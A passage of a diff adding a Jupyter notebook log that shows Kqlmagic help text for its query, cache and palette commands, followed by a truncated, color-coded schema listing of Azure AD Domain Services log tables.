\"XXX\"</code><br></li>\n<li>To disable caching, execute: <code>%kql --cache None</code><br></li>\n<li>Once results are cached, the results can be used by enabling the use of the cache, with the --use_cache command.<br>\n<br></li>\n</ul>\n</li>\n<li>\n<p>**use_cache - Enables use of cached results from a cache folder. <br></p>\n<ul>\n<li>To enable use of cache from folder XXX, execute: <code>%kql --use_cache \"XXX\"</code><br></li>\n<li>To disable use of cache, execute: <code>%kql --use_cache None</code><br></li>\n<li>Once enabled, intead of quering the data source, the results are retreived from the cache.<br>\n<br></li>\n</ul>\n</li>\n</ul>\n<h2>Examples:</h2>\n<p><code>%kql --version</code><br><br>\n<code>%kql --usage</code><br><br>\n<code>%kql --help \"help\"</code><br><br>\n<code>%kql --help \"options\"</code><br><br>\n<code>%kql --help \"conn\"</code><br><br>\n<code>%kql --palette -palette_name \"Reds\"</code><br><br>\n<code>%kql --schema 'DEMO_APP@applicationinsights'</code><br><br>\n<code>%kql --cache \"XXX\"</code><br><br>\n<code>%kql --use_cache None</code><br><br>\n<code>%kql --submit appinsights://appid='DEMO_APP';appkey='DEMO_KEY' pageViews | count</code><br><br>\n<code>%kql --palettes -palette_desaturation 0.75</code>\n<code>%kql pageViews | count</code></p>",
+        "text/markdown": "## Overview\nExcept submitting kql queries, few other commands are included that may help using the Kqlmagic.<br>\n- Only one command can be executed per magic transaction.<br>\n- A command must start with a double hyphen-minus ```--```<br>\n- If command is not specified, the default command ```\"submit\"``` is assumed, that submits the query.<br>\n\n## Commands\nThe following commands are supported:<br>\n- **submit** - Execute the query and return result. <br>\n    - Options can be used to customize the behavior of the transaction.<br>\n    - The query can parametrized.<br>\n    - This is the default command.<br>\n<br>\n\n- **version** - Displays the current version string.<br>\n<br>\n\n- **usage** - Displays usage of Kqlmagic.<br>\n<br>\n\n- **help \"topic\"** - Displays information about the topic.<br>\n    - To get the list of all the topics, execute ```%kql --help \"help\"```<br>\n<br>\n\n- **palette - Display information about the current or other named color palette.<br>\n    - The behaviour of this command will change based on the specified option:\n    - -palette_name, -palette_colors, palette_reverse, -palette_desaturation, execute ```%kql --palette -palette_name \"Reds\"```<br>\n<br>\n\n- **palettes - Display information about all available palettes.<br>\n    - The behaviour of this command will change based on the specified option:\n    - -palette_colors, palette_reverse, -palette_desaturation, execute ```%kql --palettes -palette_desaturation 0.75```<br>\n<br>\n\n- **schema \"database\"** - Returns the database schema as a python dict (displayed as a json format). <br>\n    - To get Azure Data Explorer database schema: ```%kql --schema \"databasename@clustername\"```<br>\n    - To get application insights app schema: ```%kql --schema \"appname@applicationinsights\"```<br>\n    - To get log analytics workspace schema: ```%kql --schema \"workspacename@loganalytics\"```<br>\n    - To get current connection database schema ```%kql --schema```<br>\n    - If -conn option is sepcified it will override the database value.<br>\n<br>\n\n- **cache - Enables caching query results to a cache folder, or disbale. <br>\n    - To enable caching to folder XXX, execute: ```%kql --cache \"XXX\"```<br>\n    - To disable caching, execute: ```%kql --cache None```<br>\n    - Once results are cached, the results can be used by enabling the use of the cache, with the --use_cache command.<br>\n<br>\n\n- **use_cache - Enables use of cached results from a cache folder. <br>\n    - To enable use of cache from folder XXX, execute: ```%kql --use_cache \"XXX\"```<br>\n    - To disable use of cache, execute: ```%kql --use_cache None```<br>\n    - Once enabled, intead of quering the data source, the results are retreived from the cache.<br>\n<br>\n\n## Examples:\n```%kql --version```<br><br>\n```%kql --usage```<br><br>\n```%kql --help \"help\"```<br><br>\n```%kql --help \"options\"```<br><br>\n```%kql --help \"conn\"```<br><br>\n```%kql --palette -palette_name \"Reds\"```<br><br>\n```%kql --schema 'DEMO_APP@applicationinsights'```<br><br>\n```%kql --cache \"XXX\"```<br><br>\n```%kql --use_cache None```<br><br>\n```%kql --submit appinsights://appid='DEMO_APP';appkey='DEMO_KEY' pageViews | count```<br><br>\n```%kql --palettes -palette_desaturation 0.75```\n```%kql pageViews | count```\n",
+        "text/plain": "Overview\nExcept submitting kql queries, few other commands are included that may help using the Kqlmagic.\n- Only one command can be executed per magic transaction.\n- A command must start with a double hyphen-minus --\n- If command is not specified, the default command \"submit\" is assumed, that submits the query.\nCommands\nThe following commands are supported:\n- submit - Execute the query and return result. \n    - Options can be used to customize the behavior of the transaction.\n    - The query can parametrized.\n    - This is the default command.\n\n\n\nversion - Displays the current version string.\n\n\n\nusage - Displays usage of Kqlmagic.\n\n\n\nhelp \"topic\" - Displays information about the topic.\n\nTo get the list of all the topics, execute %kql --help \"help\"\n\n\n\n\n**palette - Display information about the current or other named color palette.\n\nThe behaviour of this command will change based on the specified option:\n-palette_name, -palette_colors, palette_reverse, -palette_desaturation, execute %kql --palette -palette_name \"Reds\"\n\n\n\n\n**palettes - Display information about all available palettes.\n\nThe behaviour of this command will change based on the specified option:\n-palette_colors, palette_reverse, -palette_desaturation, execute %kql --palettes -palette_desaturation 0.75\n\n\n\n\nschema \"database\" - Returns the database schema as a python dict (displayed as a json format). \n\nTo get Azure Data Explorer database schema: %kql --schema \"databasename@clustername\"\nTo get application insights app schema: %kql --schema \"appname@applicationinsights\"\nTo get log analytics workspace schema: %kql --schema \"workspacename@loganalytics\"\nTo get current connection database schema %kql --schema\nIf -conn option is sepcified it will override the database value.\n\n\n\n\n**cache - Enables caching query results to a cache folder, or disbale. \n\nTo enable caching to folder XXX, execute: %kql --cache \"XXX\"\nTo disable caching, execute: %kql --cache None\nOnce results are cached, the results can be used by enabling the use of the cache, with the --use_cache command.\n\n\n\n\n**use_cache - Enables use of cached results from a cache folder. \n\nTo enable use of cache from folder XXX, execute: %kql --use_cache \"XXX\"\nTo disable use of cache, execute: %kql --use_cache None\nOnce enabled, intead of quering the data source, the results are retreived from the cache.\n\n\n\n\nExamples:\n%kql --version\n%kql --usage\n%kql --help \"help\"\n%kql --help \"options\"\n%kql --help \"conn\"\n%kql --palette -palette_name \"Reds\"\n%kql --schema 'DEMO_APP@applicationinsights'\n%kql --cache \"XXX\"\n%kql --use_cache None\n%kql --submit appinsights://appid='DEMO_APP';appkey='DEMO_KEY' pageViews | count\n%kql --palettes -palette_desaturation 0.75\n%kql pageViews | count"
+       },
+       "execution_count": 13,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --help \"commands\""
+    },
+    "executionTime": "2019-08-15T21:16:59.019Z"
+   },
+   {
+    "cell": {
+     "executionCount": 14,
+     "executionEventId": "4d635d06-f9aa-462b-967e-2ed7628175ea",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "{\n    \u001b[94m\"AADDomainServicesAccountLogon\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertIssuerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertSerialNumber\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertThumbprint\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureCode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MappedName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MappingBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreAuthType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TicketOptions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesAccountManagement\"\u001b[39;49;00m: {\n        \u001b[94m\"AccountExpires\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AllowedToDelegateTo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerAccountChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DnsHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupTypeChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomeDirectory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonHours\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MembershipExpirationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"NewTargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldTargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordLastSet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrimaryGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SamAccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScriptPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServicePrincipalNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidHistory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAccountControl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserWorkstations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Workstation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesDirectoryServiceAccess\"\u001b[39;49;00m: {\n        \u001b[94m\"AppCorrelationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeLDAPDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeSyntaxOID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DSType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectGUID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpCorrelationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TreeDelete\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesLogonLogoff\"\u001b[39;49;00m: {\n        \u001b[94m\"AuthenticationPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevatedToken\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ImpersonationLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeyLength\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LmPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RestrictedAdminMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLinkedLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetServerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TdoSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TransmittedServices\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VirtualAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkstationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesPolicyChange\"\u001b[39;49;00m: {\n        \u001b[94m\"AccessGranted\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccessRemoved\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditPolicyChanges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CollisionTargetName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CollisionTargetType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CrashOnAuditFailValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DisabledPrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DnsName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainBehaviorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainPolicyChanged\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EnabledPrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EntryType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Flags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ForceLogoff\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForestRoot\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForestRootSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HandleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KerberosPolicyChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutDuration\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutObservationWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutThreshold\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineAccountQuota\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaxPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MixedDomainMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetbiosName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewSd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OemInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldSd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordHistoryLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidFilteringEnabled\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TdoAttributes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TdoDirection\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TdoType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TopLevelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesPrivilegeUse\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewState\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: 